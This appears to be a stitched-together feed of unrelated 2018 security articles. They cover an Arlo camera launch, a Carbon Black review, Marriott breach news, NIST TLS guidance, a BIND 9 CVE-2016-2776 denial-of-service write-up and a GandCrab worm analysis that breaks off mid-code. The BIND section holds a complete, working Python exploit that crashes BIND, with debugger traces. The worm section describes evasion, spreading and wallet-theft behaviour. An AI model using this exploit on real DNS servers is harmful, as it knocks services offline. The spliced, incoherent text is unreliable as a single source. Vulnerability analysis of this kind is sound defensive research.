
Arlo Unveils Wire-Free 4K HDR Security Camera System


Arlo is looking to change the game when it comes to security cameras. The company has just announced a brand new camera called Arlo Ultra that manages to function without wires, which is quite rare for security cameras.

As impressive as the lack of wires is, it’s been done before. What makes the Arlo Ultra stand out is the fact that it captures in 4K resolution with HDR, which is extremely impressive for a security camera.

Make sure you have a 4K display to look at your captured footage on, though!

What’s the Arlo Ultra?

As mentioned from the outset, this is a wire-free security camera that can capture in gorgeous 4K HDR, which is quite rare in the world of security cameras. Previously, the company offered the Arlo Pro 2, which featured the wire-free element of the Ultra, but it was only able to capture footage in 1080p.

The Arlo Ultra also features color night vision and advanced image processing, which should make you forget that you’re even looking at footage captured through a security camera.

For audio, the Ultra features dual microphones, which means it will be able to record clear, crisp two-way audio with advanced noise cancelation.



Because of the wire-free design, the camera does need to be recharged between uses. However, if you’re planning to mount it somewhere semi-permanently, you can simply plug it in and leave it.

According to Pat Collins, senior vice president of Arlo products, “Our new flagship wire-free camera represents major advancements in video, audio, software, AI, and computer vision capabilities.”

Here are some other notable features of the Arlo Ultra:

180-degree field of view
LED spotlight built-in
Built-in siren that can be triggered by motion, audio detection, or manually activated
Magnetic mount lets users install the camera on ceilings, walls, eaves, or place it on tables or counter surfaces
Comes with an Arlo Smart Premier subscription for one year ($119.88 value)

When Can You Get an Arlo Ultra?

Arlo announced that its latest camera will be available in the first quarter of 2019, so you won’t have to wait too long to get your hands on one.

As of this writing, the company hasn’t revealed pricing information for a single camera. However, Best Buy has a two-camera setup available for $599 for pre-order.

If you can’t wait, check out our list of the best wireless security cameras that you can get right now.



Arlo Ultra is a 4K HDR-enabled security camera for your home


Why it matters: The biggest selling point here is without a doubt the 4K resolution. 1080p is considered the gold standard for today’s security solutions but in practice, I’ve found it has some pretty serious limitations. I’m also concerned about the bandwidth requirements for 4K as my 1080p doorbell camera struggles with connectivity and quality way more often than I’d like.

Arlo, the home security camera brand from Netgear, has announced its first 4K Ultra HD recording solution. The aptly named Arlo Ultra is a wire-free security system boasting high dynamic range (HDR), color night vision and advanced image processing in a package that looks no different than your ordinary security camera.



Arlo’s new camera also offers a 180-degree diagonal field of view, an integrated LED spotlight and dual microphones for two-way audio.

Bundled with the Arlo Ultra is the Arlo SmartHub. This device connects to your router to provide extended Wi-Fi range to Arlo cameras, manage traffic to and from the camera to the user’s cloud account and provide “a more secure dedicated IOT network for the devices connected to the Arlo SmartHub.”

The SmartHub features a microSD card slot for local storage of recorded video.



Arlo Ultra is set to launch in the first quarter of 2019 for $399.99 and includes a one-year Arlo Smart Premier subscription (a $119.88 value).

Carbon Black: Endpoint Security [product review]

Introduction

Carbon Black Endpoint Security is an effective and user-friendly endpoint solution for user devices such as PCs and laptops. It features malware protection that keeps threats at bay while protecting your network and computer systems from hackers and viruses.

Carbon Black seeks to transform cybersecurity through the use of big data and analytics, combined with cloud technologies. They have recognized that mobile devices and cloud technologies have moved the goal posts as far as endpoint security is concerned, prompting them to develop a proactive approach to threats.

Carbon Black Endpoint Security uses online hashes to detect malware and virus incidents in your local environment, which means that most organizations that implement it are stunned to find multiple incidents of previously undetected malware. This is a great way for your team to learn how to adapt to Carbon Black Endpoint Security while also developing new incident response routines.

Carbon Black Endpoint protection offers solutions to all of your organization’s security needs and uses a series of individual services that run locally on your private network as well as remotely in the cloud.

These services include:

Predict and Prevent: Finds new and existing malware and protects systems
Capture and Analyze: Carbon Black uses predictive cloud technology and storage
Quick Response: Detection and response capabilities work in real time
Operate at Scale: Automation enables mass deployment and task completion

Key Features

The individual components that make up Carbon Black’s protection products enable it to defend against both emerging and known threats, giving endpoint users the confidence and assurance that their IT systems are protected and safe at all times. We will look at each individual component and explore what each one does.

Predict and Prevent

Carbon Black understands that today’s cybercriminals are at the forefront of innovation when it comes to developing malware and viruses, which means that they can rapidly develop and deploy new threats faster than ever before. Traditional antivirus and endpoint solutions are simply unable to keep up with the pace, and inevitably end up in a reactive stance against malware, viruses and hackers.

Carbon Black is able to stay one step ahead of this disturbing trend by using an advanced predictive model that is based in the cloud, which uncovers malicious behavior before it manifests itself as a surprise attack or infection across your network. It is able to stop malware and ransomware and can even help to stop non-malware-based attacks. It prevents attacks without you needing to do a thing, automatically stopping threats as they occur whether the system is online or offline.

Capture and Analyze

Carbon Black’s Predictive Security Cloud is able to capture and store a wide range of system metrics in an unfiltered form from each and every endpoint that is plugged into the system, which gives it a massive data set to work with. When combined, this data can help paint a picture of what is happening on many different levels, from local or individual systems to a macro overview of a network or region.

This helps Carbon Black to identify emerging threats that haven’t yet broken the surface, where traditional anti-malware and antivirus software usually fails. This is because it is able to store and record the complete records of each endpoint, even if it goes offline. The system is able to analyze all of the endpoint activity against signatures of known behavior and reputation, which are compared to over 110 known behaviors that are commonly used by attackers.

Quick Response

Carbon Black Endpoint Security is equipped with an industry-leading detection and response system that allows it to reveal suspicious and threatening behavior in real time. This allows you and your team to decide on the urgency and speediness of your threat response, and how long you have in order to contain the threat as quickly as possible. Once the threat has been identified, you and your team can respond accordingly.

Operate at Scale

If you compare Carbon Black Endpoint Security with traditional products, you will find that antivirus software has a few distinct disadvantages. Carbon Black automates tasks such as deployment, updating and threat detection. This makes it a simple solution to deploy to your environment, regardless of size. It scales well across large networks and uses minimal system resources on endpoint computers. Users can expect 1% CPU and hard disk usage, so the performance impact is practically unnoticeable.

The open API lets Carbon Black fit in with your environment, allowing customization and integration with your systems. Real-time sensors make it easy for your IT team to detect and manage threats with almost no effort, which is excellent news for system admins.

SecurityIQ Awareness Education

SecurityIQ is an on-demand training program that has been developed by InfoSec Institute to allow organizations to upskill and train employees to handle the situation whenever an incident is triggered. The idea of an on-demand alert for training is important if you want to turn a disaster situation into a teachable moment for the rest of the organization. The system uses micro-training as a way to instill proper real-world training with actual threat scenarios.

The REST API used as the integration protocol by Security IQ is implemented within Carbon Black and lets the two systems work together. If real-world, onsite training is a concern for your company at present, then this is the right solution for you and your organization. You can learn more about Security IQ here.

Conclusion

Carbon Black offers protection that is highly-advanced and cloud-based, with real-time detection that will give your team enough time to respond effectively. Thanks to the large volumes of data that Carbon Black analyzes and sorts through, you will be in a much better position than if you were to use an outdated antivirus solution on its own.

Carbon Black is able to integrate with SecurityIQ so that your users come away with new knowledge about how they can keep their systems safe from malware, viruses and attackers. By combining SecurityIQ with Carbon Black, users can not only be protected, but educated in the event that something slips through the net. IT security is like health care: always critical, but prevention is better than cure.


Marriott Hack Highlights Cybersecurity Risk in Acquisitions



Sina US Stock News, Beijing time, December 1: Marriott International disclosed a hacking incident involving the database of its Starwood subsidiary, highlighting the hidden cybersecurity risks in M&A transactions.

Marriott acquired Starwood for $13.6 billion in 2016. The company announced on November 30 that it had discovered unauthorized access to the information of as many as 500 million guests in Starwood's guest reservation database, dating back to 2014.

Even companies that vet their targets thoroughly cannot fully rule out the possibility that they are taking on risk.

A data breach in the target's systems can cost the acquirer intangible reputational damage as well as the real costs of discovering and remediating the intrusion. Companies that do not fully understand what they are buying may also face litigation over the breach, which can drag on for years.

"This is a massive breach, and the cost of mitigating the damage will be enormous," said David L. Hall, a partner at the law firm Wiggin and Dana LLP and a former federal prosecutor with the Department of Justice. "Marriott may face lawsuits from affected customers, including class actions."

Marriott determined on November 19 that the stolen data contained information from the Starwood reservation database. The company said that for 327 million of the guests, the information included names, mailing addresses, phone numbers, email addresses and passport numbers. For some guests, encrypted credit card information may also have been exposed.

In 2015, Starwood warned customers of a security breach in systems containing credit and debit card data. That announcement came just days after Marriott reached its agreement with Starwood.

Companies increasingly understand that robust due diligence is needed during a transaction. Over the past few years, environmental risk assessment has become a key issue that can change the course of a deal, alter the purchase price, or kill the transaction outright. Companies and their lawyers treat rigorous review as an essential part of negotiations.

Privacy and cybersecurity issues "are finally being recognized by deal lawyers as something that can have a huge impact on a transaction," said Lisa J. Sotto, partner and chair of the global privacy and cybersecurity practice at Hunton Andrews Kurth.

Buyers can review the target's past intrusions or cybersecurity incidents, assess the company's data assets, and conduct penetration tests and vulnerability assessments.

Verizon's acquisition of Yahoo is an example of a company paying the price for a breach. Yahoo disclosed massive data breaches during its planned merger with Verizon, which led to a $350 million reduction in the purchase price.

Companies are increasingly adding explicit cybersecurity clauses to M&A documents.

The Marriott-Starwood merger agreement was signed before news of the Yahoo hack was disclosed and contained no explicit cybersecurity clause. Since Verizon renegotiated its acquisition of Yahoo in light of Yahoo's breaches, more deal parties have added security clauses, and acquirers now conduct broader assessments of the target's systems before closing.

What Executives Need to Know about New NIST Guidelines for TLS Management



kdobieski

Fri, 11/30/2018 16:30

There are three major risks you face if you don’t effectively manage TLS certificates across your enterprise:

Application Downtime: Significant outages of business applications due to expired certificates. Nearly every organization has experienced major business application outages due to mismanaged TLS certificates.

Pivoting: Attackers moving undetected from system to system across your network after an initial intrusion because you lack visibility inside TLS-encrypted communications. Most of the sensitive data that attackers want is deep inside your networks, so they have to pivot from system to system to get to it and to get it back out. They do that through encrypted TLS connections today.

Lack of Crypto-Agility: The need to halt business operations because of an inability to change large numbers of TLS certificates in response to a cryptographic issue such as a weak algorithm or bugs in cryptographic libraries. The challenges of eliminating the use of SHA-1 should have served as a wake-up call to organizations that they need to improve their crypto-agility.

Unlike most security technologies that are deployed and managed by central InfoSec teams, TLS is individually implemented and managed on each system where it is used; and each system requires a unique cryptographic credential, called a TLS certificate. This means every department that deploys/manages systems is deploying and managing TLS certificates themselves. Many organizations have a central team responsible for certificates (typically called the PKI team) but these teams are typically understaffed and, more importantly, don’t have the right processes and technology in place to effectively support all of the teams using TLS certificates to ensure that security and operational risks are mitigated.

Even if you’ve already invested in establishing a formal TLS certificate management program and feel like you’re doing pretty well, the NIST guidance can still help you. Because the use of TLS to secure communications is rapidly increasing to encompass all major business applications in organizations, this guidance will help you ensure your TLS certificates management program will effectively scale with the expanded use of TLS to address outages and security threats.

To make sure the guidance is clear and comprehensive, NIST has released it for public review and feedback. Considering the central role TLS plays in your organization’s security, it’s critical that the guidance provide your organization everything needed to effectively manage TLS certificates and contain risk. NIST needs your feedback on whether it meets that objective.

I recommend executives read 1800-16 Volume A . It provides a high-level view of TLS certificate risks and outlines an action plan for addressing them. Volume B provides more detailed background on TLS, TLS certificates, risks, and effective strategies for effectively managing TLS certificates across your enterprise. You should ask your team (security directors, managers, and architects) to read that volume and come back to you with a plan for how your organization will implement an effective TLS certificate management program.

As a result of poor TLS certificate management, many organizations are experiencing outages, finger pointing, and undetected pivoting by attackers because nearly all traffic is encrypted with TLS and InfoSec groups can’t see malicious traffic between systems. This guidance from NIST is designed to help you eliminate these issues. Read it, start implementing, and provide your feedback on anything you feel is missing.

In addition to the new SP 1800-16 guidance, NIST has been busy updating its other key and certificate management guidance and has recently released a second draft of 800-57 Part 2 (Recommendation for Key Management, Part 2: Best Practices for Key Management Organizations) for public review. I’ll provide background on that in a separate post.


Paul Turner

If you’re an IT or InfoSec executive in an enterprise that relies on secure communications to protect its data and operation, you need to read NIST Special Publication 1800-16, which provides essential guidance for managing TLS (Transport Layer Security) certificates and was recently published for public review.

If you’re wondering, “What is he talking about? We use TLS but what’s the big deal?”, the NIST guidance is for you.

Whatever business you’re in, your organization relies on TLS and TLS certificates to secure nearly ALL your communications and authenticate nearly ALL servers inside and outside your network boundaries. If you don’t have a formal TLS certificate management program in place, your organization is at risk of outages and breaches.



[CVE-2016-2776] BIND 9 ‘buffer.c’ Denial-of-Service Vulnerability


Author: k0shl. Please credit the source when reposting: https://whereisk0shl.top

It's the last month of 2018; another year is nearly over....

Vulnerability description

BIND 9 is a well-known DNS server. Its buffer.c contains a denial-of-service vulnerability caused by an assertion, and CNVD issued a dedicated advisory classifying this BIND 9 denial-of-service vulnerability as high severity. The vulnerability stems from a length check in buffer.c: if we construct a special packet that includes a \0 byte, the length check fails, BIND 9 enters its assert handling, and a denial of service results. The vulnerability is analysed in detail below.

PoC:

```python
# PoC as posted; written for Python 2, where str literals are byte strings.
import socket
import struct

TARGET = ('192.168.200.10', 53)
Q_A = 1
Q_TSIG = 250
DNS_MESSAGE_HEADERLEN = 12


def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512):
    # Standard A query (id 0x8f65, 1 question, 1 additional) followed by a TSIG RR
    query_A = ("\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01"
               + question + int16(Q_A) + "\x00\x01")
    sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1
    tsig_rr = build_tsig_rr(sweet_spot)
    return query_A + tsig_rr


def int16(n):
    return struct.pack("!H", n)


def build_tsig_rr(bind_demarshalled_size):
    signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09"
                      "\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00")
    tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00"
    necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields)
    necessary_bytes += 2 + 2  # length fields
    # from sizeof(TSIG RR) bytes conforming the TSIG RR
    # bind9 uses sizeof(TSIG RR) - 16 to build its own
    sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)
    tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields
    tsig_data = algo_name + signature_data
    return tsig_hdr + int16(len(tsig_data)) + tsig_data


def generate_padding(n):
    # Split n bytes of padding across eight DNS labels (two names of four labels each)
    max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]
    buckets = [1] * len(max_per_bucket)
    min_size = len(buckets) * 2 + 2  # 2 bytes for every bucket plus each null byte
    max_size = sum(max_per_bucket) + len(buckets) + 2
    if not (min_size <= n <= max_size):
        # the original raised RuntimeException, which does not exist in Python
        raise RuntimeError("unsupported amount of bytes")
    curr_idx, n = 0, n - min_size
    while n > 0:
        next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)
        buckets[curr_idx] = 1 + n - next_n
        n, curr_idx = next_n, curr_idx + 1
    n_padding = lambda amount: chr(amount) + "A" * amount
    stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00"
    return stringify(buckets[:4]), stringify(buckets[4:])


if __name__ == "__main__":
    bombita = build_bind_nuke()
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(bombita, TARGET)
    s.close()
```

Vulnerability analysis

First deploy the BIND 9 service; Linux then opens port 53. Attach gdb and send the malformed packet.

The payload sits in the Additional records field. After the packet is sent, gdb hits the breakpoint.

```
gdb-peda$ run
Starting program: /usr/sbin/named
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
[New process 9722]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
[New Thread 0xb751ab40 (LWP 9723)]
[New Thread 0xb6d19b40 (LWP 9724)]
[New Thread 0xb6518b40 (LWP 9725)]

Program received signal SIGABRT, Aborted.
[Switching to Thread 0xb751ab40 (LWP 9723)]
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x25fa
ECX: 0x25fb
EDX: 0x6
ESI: 0x1
EDI: 0xb7b23000 --> 0x1a5da8
EBP: 0x800a3d30 --> 0x800a0d80 --> 0x80072745 ("main")
ESP: 0xb7515a64 --> 0x800a3d30 --> 0x800a0d80 --> 0x80072745 ("main")
EIP: 0xb7fdebe0 (<__kernel_vsyscall+16>: pop ebp)
EFLAGS: 0x200206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xb7fdebdc <__kernel_vsyscall+12>: nop
   0xb7fdebdd <__kernel_vsyscall+13>: nop
   0xb7fdebde <__kernel_vsyscall+14>: int 0x80
=> 0xb7fdebe0 <__kernel_vsyscall+16>: pop ebp
   0xb7fdebe1 <__kernel_vsyscall+17>: pop edx
   0xb7fdebe2 <__kernel_vsyscall+18>: pop ecx
   0xb7fdebe3 <__kernel_vsyscall+19>: ret
   0xb7fdebe4: int3
[------------------------------------stack-------------------------------------]
0000| 0xb7515a64 --> 0x800a3d30 --> 0x800a0d80 --> 0x80072745 ("main")
0004| 0xb7515a68 --> 0x6
0008| 0xb7515a6c --> 0x25fb
0012| 0xb7515a70 --> 0xb79ab307 (<__GI_raise+71>: xchg ebx,edi)
0016| 0xb7515a74 --> 0xb7b23000 --> 0x1a5da8
0020| 0xb7515a78 --> 0xb7515b14 --> 0x0
0024| 0xb7515a7c --> 0xb79ac9c3 (<__GI_abort+323>: mov edx,DWORD PTR gs:0x8)
0028| 0xb7515a80 --> 0x6
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGABRT
```

At this point a SIGABRT signal is received: after abort is called, execution reaches this location and the DNS service is terminated. Use bt to walk back through the call stack.

```
gdb-peda$ bt
#0  0xb7fdebe0 in __kernel_vsyscall ()
#1  0xb79ab307 in __GI_raise (sig=sig@entry=0x6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2  0xb79ac9c3 in __GI_abort () at abort.c:89
#3  0x8002da86 in ?? ()
#4  0xb7cdb7d5 in isc_assertion_failed () from /usr/lib/libisc.so.95
#5  0xb7cdd931 in isc.buffer_add () from /usr/lib/libisc.so.95
#6  0xb7de784b in dns_name_towire () from /usr/lib/libdns.so.100
#7  0xb7e58b08 in ?? () from /usr/lib/libdns.so.100
#8  0xb7ddf0a0 in dns_message_rendersection () from /usr/lib/libdns.so.100
#9  0x80021417 in ?? ()
#10 0x80021851 in ?? ()
#11 0x80022ac4 in ?? ()
#12 0xb7cfdf0c in ?? () from /usr/lib/libisc.so.95
#13 0xb7caeefb in start_thread (arg=0xb751ab40) at pthread_create.c:309
#14 0xb7a6662e in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:129
```

We can see that isc_assertion_failed is called at frame #4, followed by abort and then the vsyscall that terminates the service. The assert at frame #4 should be an assertion failure. Let's look at the relevant part of the buffer.c source.

```c
void
isc__buffer_add(isc_buffer_t *b, unsigned int n) {
	/*
	 * Increase the 'used' region of 'b' by 'n' bytes.
	 */

	REQUIRE(ISC_BUFFER_VALID(b));
	REQUIRE(b->used + n <= b->length);

	ISC__BUFFER_ADD(b, n);
}
```

The source comments for isc__buffer_add say nothing about an assert, but REQUIRE is in fact an assertion macro. Let's observe the process in IDA.

First, when the server receives the packet, it calls dns_name_towire to process the name portion according to the additional records field.

```c
isc_result_t
dns_name_towire(dns_name_t *name, dns_compress_t *cctx, isc_buffer_t *target) {
	/* …… */
	dns_name_init(&gp, po);
	dns_name_init(&gs, so);
	isc_buffer_init(&gws, gb, sizeof (gb));

	offset = target->used;  /*XXX*/

	methods = dns_compress_getmethods(cctx);

	if ((methods & DNS_COMPRESS_GLOBAL) != 0)
		gf = dns_compress_findglobal(cctx, name, &gp, &gs, &go, &gws);
	else
		gf = ISC_FALSE;

	/*
	 * Will the compression pointer reduce the message size?
	 */
	if (gf && (gp.length + ((go < 16384) ? 2 : 3)) >= name->length)
		gf = ISC_FALSE;

	if (gf) {
		if (target->length - target->used < gp.length)
			return (ISC_R_NOSPACE);
		(void)memcpy((unsigned char *)target->base + target->used,
			     gp.ndata, (size_t)gp.length);
		isc_buffer_add(target, gp.length);
	/* …… */
}
```

I have kept only the key part of the code here; the call isc_buffer_add(target, gp.length); is the critical one.

We need to track the value of gp. The buffer that the target pointer points to is in fact the malformed string. So what is gp's value? It comes from dns_compress_findglobal.

```c
isc_boolean_t
dns_compress_findglobal(dns_compress_t *cctx, dns_name_t *name,
			dns_name_t *prefix, dns_name_t *suffix,
			isc_uint16_t *offset, isc_buffer_t *workspace)
{
	REQUIRE(VALID_CCTX(cctx));
	REQUIRE(dns_name_isabsolute(name) == ISC_TRUE);
	REQUIRE(offset != NULL);

	return (compress_find(cctx->global, name, prefix, suffix, offset,
			      workspace));
}
```

gp is the prefix part of the name; execution then enters isc__buffer_add.

```c
int __cdecl isc__buffer_add(int a1, int a2)
{
  int result; // eax@1
  unsigned int v3; // edx@3

  result = a1;
  if ( !a1 || *(_DWORD *)a1 != 1114990113 )
    isc_assertion_failed(
      (int)"buffer.c",
      126,
      0,
      (int)"(((b) != ((void *)0)) && (((const isc__magic_t *)(b))->magic == (0x42756621U)))");
  v3 = *(_DWORD *)(a1 + 12) + a2;
  if ( v3 > *(_DWORD *)(a1 + 8) )
    isc_assertion_failed((int)"buffer.c", 127, 0, (int)"b->used + n <= b->length");
  *(_DWORD *)(a1 + 12) = v3;
  return result;
}
```

When we reach the second assertion check, if ( v3 > *(_DWORD *)(a1 + 8) ), let's look at the values involved. First, a1+8 is the field of the name structure that stores the name length.

```
[------------------------------------stack-------------------------------------]
0000| 0xb74de6b0 --> 0xb74de710 ("nSND\b\020L\265\001")
0004| 0xb74de6b4 --> 0xb7cdd8d6 (<isc__buffer_add+6>: add ebx,0x5f0aa)
0008| 0xb74de6b8 --> 0xb7f9fac8 --> 0x22a998
0012| 0xb74de6bc --> 0xb7de784b (<dns_name_towire+507>: movzx eax,WORD PTR [esp+0x18])
0016| 0xb74de6c0 --> 0xb54c5040 ("!fuBxQL\265")
0020| 0xb74de6c4 --> 0x1
0024| 0xb74de6c8 --> 0x1
0028| 0xb74de6cc --> 0xb74de6e2 --> 0x536e0000 ('')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0xb7cdd8f6 in isc.buffer_add () from /usr/lib/libisc.so.95
gdb-peda$ x/10x $eax
0xb54c5040: 0x42756621 0xb54c5178 0x00000200 0x0000000c
0xb54c5050: 0x00000000 0x00000000 0xffffffff 0xffffffff
0xb54c5060: 0x00000000 0x00000000
```

Note the location b54c5040+8h, which holds the length. This length is derived from a field value in the DNS packet, but if a \0 is encountered, reading stops there.

So looking again at the packet we sent: when a \0 is encountered, the condition on v3 is satisfied, that is, the total length exceeds the length stored in the field, the assertion check is entered, and the DNS service is terminated.
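To make the invariant concrete, here is an added example in C (not from the post and not BIND's code). It models the buffer fields the dump shows (length at +8, used at +12) and contrasts the REQUIRE precondition inside isc__buffer_add, which aborts the whole named process when violated, with the caller-side ISC_R_NOSPACE check that dns_name_towire performs before copying; the 512-byte message buffer and 12-byte header are taken from the dump values 0x200 and 0xc, and the name chunks are constructed filler.

```c
#include <stdio.h>
#include <string.h>

/* Cut-down stand-in for isc_buffer_t (assumed layout, matching the dump). */
typedef struct {
    unsigned char *base;
    unsigned int length;  /* capacity of the buffer        (+8 in the dump)  */
    unsigned int used;    /* bytes already rendered into it (+12 in the dump) */
} msg_buffer_t;

enum { RESULT_SUCCESS = 0, RESULT_NOSPACE = 1 };

/* Exactly the test REQUIRE(b->used + n <= b->length) performs: 1 means the add
 * is legal, 0 means the real isc__buffer_add would call isc_assertion_failed()
 * and abort named, which is the denial of service the post describes. */
int add_precondition_holds(const msg_buffer_t *b, unsigned int n)
{
    return b->used + n <= b->length;
}

/* Caller-side guard written the way dns_name_towire writes it:
 *     if (target->length - target->used < gp.length) return (ISC_R_NOSPACE);
 * The append is refused before anything is copied, so the REQUIRE can never
 * fire for input whose size the sender controls. */
int buffer_append_checked(msg_buffer_t *b, const unsigned char *src, unsigned int n)
{
    if (b->length - b->used < n)
        return RESULT_NOSPACE;
    memcpy(b->base + b->used, src, n);
    b->used += n;                      /* what ISC__BUFFER_ADD(b, n) does */
    return RESULT_SUCCESS;
}

/* Render `count` chunks of wire-format name data (constructed 'A' filler)
 * into the message buffer. Returns the index of the first chunk refused with
 * RESULT_NOSPACE, or -1 if every chunk fit. */
int render_name_chunks(msg_buffer_t *b, const unsigned int *lens, int count)
{
    unsigned char filler[512];
    memset(filler, 'A', sizeof filler);
    for (int i = 0; i < count; i++) {
        if (lens[i] > sizeof filler)
            return i;                  /* larger than any chunk this model holds */
        if (buffer_append_checked(b, filler, lens[i]) != RESULT_SUCCESS)
            return i;
    }
    return -1;
}

/* Scenario: 512-byte UDP-sized message, 12-byte header already used, then name
 * data that fills the buffer exactly and one byte more. Under REQUIRE alone the
 * third chunk aborts the process; with the caller-side check it is reported as
 * index 2 and the buffer stays consistent with used == length. */
int scenario_spill(unsigned int *used_out)
{
    unsigned char storage[512];
    msg_buffer_t b = { storage, sizeof storage, 12 };
    unsigned int lens[] = { 300, 200, 1 };
    int rejected = render_name_chunks(&b, lens, 3);
    if (used_out) *used_out = b.used;
    return rejected;
}

/* Same buffer, chunks that sum to exactly the remaining space: all accepted. */
int scenario_fits(unsigned int *used_out)
{
    unsigned char storage[512];
    msg_buffer_t b = { storage, sizeof storage, 12 };
    unsigned int lens[] = { 256, 244 };    /* 12 + 256 + 244 == 512 */
    int rejected = render_name_chunks(&b, lens, 2);
    if (used_out) *used_out = b.used;
    return rejected;
}

int main(void)
{
    unsigned int used;
    int idx = scenario_spill(&used);
    printf("spill: chunk %d refused, used=%u\n", idx, used);
    idx = scenario_fits(&used);
    printf("fits:  result %d, used=%u\n", idx, used);
    return 0;
}
```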

Hackers Had Access to Marriott's Database for Four Years; 500 Million People's Data Leaked


[CNMO News] On the evening of November 30, Marriott published an announcement titled "Marriott International Releases Information on the Starwood Guest Reservation Database Security Incident". It states that since 2014 there had been unauthorized third-party access to the Starwood network. Marriott recently discovered that the unauthorized third party had copied and encrypted certain information and had taken steps to try to remove it. On November 19, 2018, Marriott succeeded in decrypting that information and determined that its contents came from the Starwood guest reservation database.


Figure: W Hotel

Marriott says the database contains records of up to 500 million customers. For roughly 327 million of those guests, the information includes names, addresses, phone numbers, email addresses, passport numbers, account information, dates of birth, gender, and arrival and departure information. Marriott also says some records include encrypted payment card information, but it cannot rule out that the encryption keys were stolen as well.


Figure: image courtesy of Marriott

Marriott International acquired Starwood in 2016, creating the world's largest hotel chain, which now has more than 5,800 hotels. Starwood's brands include W Hotels, Sheraton, Le Méridien and Four Points by Sheraton, among many others; Marriott-branded hotels use a separate reservation system on a different network. On the news, Marriott International opened down more than 5% on Friday at $115.34, for a total market value of $40.756 billion.

New GandCrab Distribution Channel: Technical Analysis of a "Five-Poison" Worm V1.1


Overview

Recently, the 360 Endpoint Security Lab observed a new trend in the GandCrab ransomware: compared with earlier periods, GandCrab's distribution volume fluctuated noticeably. We analysed the cause and found that the fluctuation was driven by a worm that has been fairly common in recent years. The worm spreads mainly via USB drives and archive files and has stayed active on many endpoints, including on local networks. The botnet formed by this worm used to distribute mainly RATs, stealers and miners; it has now started delivering the GandCrab ransomware. Because the worm has infected many hosts and has a wide reach, it caused this fluctuation in GandCrab distribution. We remind everyone to protect their data and beware of irrecoverable losses from ransomware.

We performed an in-depth analysis of the worm's latest variant. The worm body has not changed much compared with earlier versions; what is notable is the change in the payloads it delivers. Besides the newly added GandCrab ransomware, we also identified the worm's initial seeding method, that is, how its author first distributes it. Common initial seeding methods include drive-by downloads, bundled downloads, email attachments, rented botnets and exploits; this time the worm used email attachments as one of its initial distribution channels.

Its main technical characteristics are summarised below:

The code uses a consistent obfuscation style, decrypting a PE in memory and loading it to evade static scanning by antivirus software; the worm body has some anti-sandbox and anti-analysis capability;
Multiple propagation methods, including sending malicious mail, infecting web/FTP server directories, spreading via USB/network drives, and infecting archive files;
Theft of multiple cryptocurrency wallets, including Exodus, JAXX, MultiBit HD, Monero, Electrum, Electrum-LTC and Bitcoin Core;
Hijacking of the Windows clipboard to replace the addresses of many mainstream cryptocurrency wallets, including BTC, ETH, LTC, XMR, XRP, ZEC, DASH and DOGE;
Theft of email accounts, website login accounts, WinSCP credentials, Steam accounts, and chat logs from several instant messaging clients;
Download and distribution of multiple malware families, including ransomware, stealers, miners and the worm's own propagation module; the download links embedded in the worm body are fixed at five, which is exactly where the "five poisons" nickname comes from.

Attack flow

Figure: attack flow

Detailed analysis

Parent downloader analysis

Detecting virtual machine / sandbox environments

The worm body is a downloader. At run time it enumerates processes and checks loaded modules to detect whether it is running in a VM or sandbox. It checks specifically for python processes (commonly used by sandboxes) and also inspects loaded DLL modules to detect sandboxie or sysanalyzer:


Persistence

The worm copies itself to windows\<self-created directory>\winsvcs32.exe and creates a registry Run key for persistence:


Figure: copies itself and renames the copy to winsvc32.exe


Figure: creates a registry Run key


Figure: deletes its own Zone.Identifier NTFS stream to avoid the run-time warning

Adds a firewall exception and disables Windows Defender real-time protection and related features

Figure: firewall and Windows Defender settings

AUTORUN propagation via removable and network drives

Figure: targets network drives and removable drives


Figure: creates a "_" directory in the USB drive root and copies itself there as DeviceManager.exe


Figure: creates an .lnk file pointing to the worm binary


Figure: contents of the .lnk file


Figure: an infected USB drive and its AutoRun.inf

Propagation by infecting archives

Checks whether %appdata%\winsvcs.txt exists and creates it if not. The file acts as a switch that decides whether archive files are to be infected:



Copies itself to the %TEMP% directory, renamed to "Windows Archive Manager.exe":



Enumerates archive files on local disks and adds the worm body to each archive; the affected archive types are zip, rar, 7z and tar:



This part of the code is not fully mature: in testing, only zip and rar work. The 7z and tar support is buggy and corrupts the original format after infection:


Propagation by replacing EXE files in FTP/web server directories

Enumerates files on disk and checks whether an EXE file's path contains one of the following FTP/web server directories:



If the condition is met, the EXE files in that directory are replaced with the worm's own file:


Monitoring the system clipboard and hijacking cryptocurrency wallet addresses

Monitors the clipboard and, when an expected cryptocurrency wallet address is found, replaces it. The affected coins include:

BTC, ETH, LTC, XMR, XRP, ZEC, DASH, DOGE and others.


Figure: checks the address patterns of each cryptocurrency


Figure: clipboard hijack loop
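A defender-side check for the clipboard-swap behaviour described above, added here as an example (it is neither the 360 lab's code nor code from the worm). It classifies a string into one of the eight wallet families the post lists using simplified prefix/length/alphabet rules (assumed, not exhaustive), then flags a clipboard change in which one address was replaced by a different address of the same family, which is what the hijack produces; a real monitor would feed it the previous and current clipboard contents.

```c
#include <stdio.h>
#include <string.h>

typedef enum {
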